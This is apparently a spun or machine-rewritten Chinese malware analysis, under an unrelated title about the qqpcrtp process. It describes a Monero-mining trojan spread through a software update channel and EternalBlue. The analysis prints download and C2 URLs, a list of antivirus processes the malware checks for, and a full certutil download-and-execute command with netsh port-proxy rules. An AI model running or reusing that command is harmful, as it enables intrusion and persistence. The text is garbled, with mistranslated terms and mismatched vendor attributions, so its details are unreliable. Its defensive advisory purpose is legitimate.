本文由 发布,转载请注明出处,如有问题请联系我们! 发布时间: 2021-08-01qqpcrtp是什么进程-阻止电脑自动安装软件的方法
加载中百度安全威胁情报核心发觉,一款根据“安全驾驶人生道路”升級安全通道,运用“永恒不变蓝”高危系统漏洞散播的木马病毒忽然暴发,短短的2钟头内黑客攻击用户量做到10万。“安全驾驶日常生活”木马病毒会运用高危系统漏洞像内部网蜘蛛一样散播,进一步免费下载云控系统木马病毒在中毒了电脑上中发掘门罗币。
一.简述
12月14日中午,百度安全与威胁情报核心发觉,一款根据“安全驾驶人生道路”升級安全通道,运用“永恒不变蓝”高危系统漏洞散播的木马病毒忽然暴发,短短的2钟头内黑客攻击用户量做到10万。
“安全驾驶日常生活”木马病毒会运用高危系统漏洞像内部网蜘蛛一样散播,进一步免费下载云控系统木马病毒在中毒了电脑发掘门罗币。云控系统木马病毒对公司网络信息安全组成巨大威协,公司客户应引起重视。
病毒感染恰好在周末暴发,让企业网管猝不及防。职工电脑上周一工作日内开机后,提议马上查杀病毒,随后运用电脑杀毒软件的漏洞补丁作用安裝漏洞补丁。个人计算机客户能够应用腾讯电脑管理工具开展自身防御力。
此次丧尸病毒有三个特性:
1.推动性命升級安全通道的疫情会在中毒了的电脑安裝云控系统木马病毒;
2.病毒感染会运用永恒不变的深蓝色系统漏洞在局域网络中积极散播;
3.根据云控系统搜集中毒了电脑上的一些信息内容,接纳云命令在中毒了电脑上中发掘门罗币。
木马病毒进攻流程表。二,深入分析。
Dtlupg.exe浏览下列网站地址免费下载病毒感染。
hxxp://xxxx . update . ack ng . com/zip tool/pull exec/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
hxxp://xxxx . update . ack ng . com/calendar/pull exec/f 79 CB 9d 2893 b 254 cc 75 DFB 7 F3 e 454 a 69 . exe
(留意,为了更好地避免客户点一下之上连接直接下载木马程序,早已掩藏了一部分标识符。).
病毒感染文档公布于:
c:体系文件(x86)dtlsoftriliupdatertrlff79cb9d2893b254cc75dfb7f3e454a69.exe等。
F79cb9d2893b254cc75dfb7f3e454a69.exe总算在运作后公布了C:Windowstempsvhost . exe。
(MD5:2e 9710 a 4b 9cb 3a CD 11e 977 af 87570 e3b),svvhost.exe装包了“永恒不变蓝”等系统漏洞进攻专用工具,在內外网进一步蔓延。
2.1病毒感染亲本。
F79CB9D2893B254CC75DFB7F3E454A69.exe
运作后,将本身拷贝到C:windowssystem 32 svost . exe,做为服务项目安裝并运行,服务项目名叫Ddiver,随后拉起云控系统控制模块svhhost.exe和进攻控制模块svvhost.exe。
在操作时,检验相互独立体以明确它是不是被感染。
搜集行凶信息内容,根据检验下列全过程提前准备提交。360 tray . exe | 360 SD . exe | AVP . exe | kvmonxp . exe | rav mond . exe | Mcshield . exe | egui . exe | kxetray . exe | knsdtray . exe | tmbmsrv . exe | avcenter . exe | ashdisp . exe | rtvscan . exe | ksafe . exe | qqp RTP . exe
假如检验到资源管理器游戏进展,云模块svhhost.exe将撤出。
开启相互独立体,目标名是“我是xmr reporter”,而xmr的意思是xmrig.exe挖矿机。
搜集比较敏感的系统信息并上传入hxxp://I . hako . net/I . png,接纳回到的云控系统程序执行。
设定父过程共享内存HSKALWOEDJSLALQEOD。
2.2开采。云控系统木马病毒svhhost.exe的关键作用是以父过程svhost.exe的共享内存中载入shellcode开展破译和实行,每2000秒载入一次共享内存中的shellcode开展破译和实行。共享内存称之为HSKALWOEDJSLALQEOD。现阶段shellcode关键作用是挖币,但都不清除中后期会拉数据加密,敲诈勒索等别的更故意的木马程序实行。
云控系统木马病毒实行全过程。木马病毒运作后会建立一个进程。这一进程涵数的关键作用是分辨过程svhost.exe(父过程)是不是存有,假如不会有,运行过程。下一个要导入的共享内存数据信息是以这一过程中载入的。
建立进程分辨父过程是不是存有。启用OpenFileMappingA开启共享内存,载入共享内存数据信息。
载入共享内存数据信息。启用RtlDecompressBuffer涵数对共享内存中的信息开展缓解压力,为下一步做准备。
压缩包解压共享内存数据信息。共享内存数据信息被缩小后,将强制执行。现阶段,shellcode的关键作用是发掘。不清除中后期会拉别的更故意的数据加密,敲诈勒索等木马程序实行。
实行机壳编码
当尝试发掘时,通讯IP是172.105.204.237。
2.3进攻控制模块。进攻控制模块从详细地址hxxp://dl . hako . net/EB . exez免费下载,做为子过程Svvhost.Exe运行。剖析后发觉该文件是python完成的“永恒不变蓝”漏洞检测控制模块的缩小装包器。
子过程Svvhost.Exe为python完成的“比特币病毒”漏洞检测控制模块缩小装包程序流程。
Mysmb.pyo是进攻时的扫描仪码。
有关的开放源码还可以在GitHub上见到。
扫描仪内网的端口号445以发觉进攻。
不但用內部互联网系统漏洞进攻设备,还任意找好多个外界互联网IP试着进攻,一次进攻后沉默无言20分鐘。
进攻取得成功后,paylaod征募设备实行下列指令来散播内网。cmd.exe/c certutil-URL cache-split-f http://dl.haqo.net/dl.exe c:/install . exe & c:/install . exe & netsh服务器防火墙加上端口号开启tcp 65531 DNS& netsh插口端口号代理商加上v4to v4 listenport = 65531 connect address = 1 . 1 . 1 . 1 connect port = 53
安全性提议
1.网络服务器临时关掉多余的端口号(如135.139和445)。请参照https://guanjia.qq.com/web_clinic/s8/585.html.
2.公司客户周一工作后,提议应用腾讯官方御典消毒(普通用户能够应用腾讯官方Computer Manager),随后应用漏洞补丁作用修补各大网站终端设备存有的系统软件高危系统漏洞;
3.网络服务器应用高韧性登陆密码,不必应用明文密码,避免网络黑客暴力破解密码;
4.应用杀毒软件阻拦很有可能的病毒入侵;
5.强烈推荐公司客户布署腾讯官方皇室高級威协监测系统,防御力很有可能的黑客入侵。皇室高級威协监测系统是因为腾讯官方防病毒软件试验室的安全防护工作能力,借助腾讯云端海量信息开发设计的与众不同威胁情报和故意检验实体模型系统软件。
